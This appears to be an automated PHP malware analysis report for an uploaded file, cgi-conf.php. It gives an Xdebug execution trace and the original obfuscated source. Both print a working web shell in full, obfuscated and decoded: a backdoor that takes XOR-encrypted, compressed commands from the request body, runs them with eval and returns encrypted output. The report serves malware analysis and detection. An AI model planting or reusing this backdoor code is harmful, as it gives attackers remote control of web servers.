cgi-conf.php

md5: 85556c493e5c9d78e60a09f78731904d

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Encoding
base64_decode (Traces)
base64_encode (Traces)

Execution
eval (Traces)

Files
file_get_contents (Traces)

Input
_GET (Original, Traces)
php:\/\/input (Original, Traces)

Deobfuscated PHP code
Failed to deobfuscate code
Execution traces
data/traces/85556c493e5c9d78e60a09f78731904d_trace-1676238824.0298.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:54:09.927613]
1	0	1	0.000137	393528
1	3	0	0.000197	396464	{main}	1		/var/www/html/uploads/cgi-conf.php	0	0
1		A						/var/www/html/uploads/cgi-conf.php	2	$N = 'k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte'
1		A						/var/www/html/uploads/cgi-conf.php	3	$W = 'base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()'
1		A						/var/www/html/uploads/cgi-conf.php	4	$u = 'nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@'
1		A						/var/www/html/uploads/cgi-conf.php	5	$p = 'or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$'
2	4	0	0.000297	396464	str_replace	0		/var/www/html/uploads/cgi-conf.php	6	3	'uX'	''	'cuXruXeauXte_uXfunuXcuXtion'
2	4	1	0.000314	396600
2	4	R			'create_function'
1		A						/var/www/html/uploads/cgi-conf.php	6	$g = 'create_function'
1		A						/var/www/html/uploads/cgi-conf.php	7	$C = ';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}'
1		A						/var/www/html/uploads/cgi-conf.php	8	$Y = '9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f'
1		A						/var/www/html/uploads/cgi-conf.php	9	$r = '$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>'
2	5	0	0.000386	397144	str_replace	0		/var/www/html/uploads/cgi-conf.php	10	3	'>'	''	'$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";for($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_content>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean();$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$'
2	5	1	0.000419	397752
2	5	R			'$k="b5ef73cd";$kh="5ce24f921bbc";$kf="7fa689200ff0";$p="aOWo2okBR9FiQAlp";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/cgi-conf.php	10	$k = '$k="b5ef73cd";$kh="5ce24f921bbc";$kf="7fa689200ff0";$p="aOWo2okBR9FiQAlp";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000475	397016	create_function	0		/var/www/html/uploads/cgi-conf.php	11	2	''	'$k="b5ef73cd";$kh="5ce24f921bbc";$kf="7fa689200ff0";$p="aOWo2okBR9FiQAlp";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000556	405056	{internal eval}	1		/var/www/html/uploads/cgi-conf.php	11	0
3	7	1	0.000571	405056
3	7	R			NULL
2	6	1	0.000585	403688
2	6	R			'\000lambda_5'
1		A						/var/www/html/uploads/cgi-conf.php	11	$G = '\000lambda_5'
2	8	0	0.000613	403624	__lambda_func	1		/var/www/html/uploads/cgi-conf.php	11	0
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$k = 'b5ef73cd'
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$kh = '5ce24f921bbc'
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$kf = '7fa689200ff0'
2		A						/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	$p = 'aOWo2okBR9FiQAlp'
3	9	0	0.000673	403680	file_get_contents	0		/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	1	'php://input'
3	9	1	0.000693	404416
3	9	R			''
3	10	0	0.000706	404400	preg_match	0		/var/www/html/uploads/cgi-conf.php(11) : runtime-created function	1	3	'/5ce24f921bbc(.+)7fa689200ff0/'	''	NULL
3	10	1	0.000755	404560
3	10	R			0
2	8	1	0.000770	404320
1	3	1	0.000778	404320
			0.000803	321704
TRACE END   [2023-02-12 19:54:09.928308]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php
$N='k>{$j>};}}r>eturn $o;>}if> (@preg_>match(>"/$kh(.+)$k>f/",@f>ile>_get>_conte';
$W='base>64_decode(>>$m[1]),$k)))>;$>o>=@ob_get_co>ntents();@>ob_en>d>_clean()';
$u='nt>>s("php://input>"),$m)>==1) {@>ob>_start>();@eva>l(>@gzuncom>press(@x(>@';
$p='or($i=0;>$i><$l>;>){for($j=0;>(>$j<$c&&$i>><$l);$j++,$i+>+){$o.=$t{$i>}^$';
$g=str_replace('uX','','cuXruXeauXte_uXfunuXcuXtion');
$C=';$r>=@bas>e6>4_encod>e(@x(@gz>com>p>ress($o),$k));p>rin>t("$p$k>h$r$kf");}';
$Y='9FiQ>Alp>";functio>n x($t,>>$k>){$c=strl>e>n($k);$l=strlen($t);>$o=>"";f';
$r='$k="b5ef7>3cd";$>kh="5>>ce24f92>1bbc";>$k>f="7fa689200f>f0>";$p="aOWo2>okBR>';
$k=str_replace('>','',$r.$Y.$p.$N.$u.$W.$C);
$G=$g('',$k);$G();
?>
PHP Malware Analysis

cgi-conf.php

md5: 85556c493e5c9d78e60a09f78731904d

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
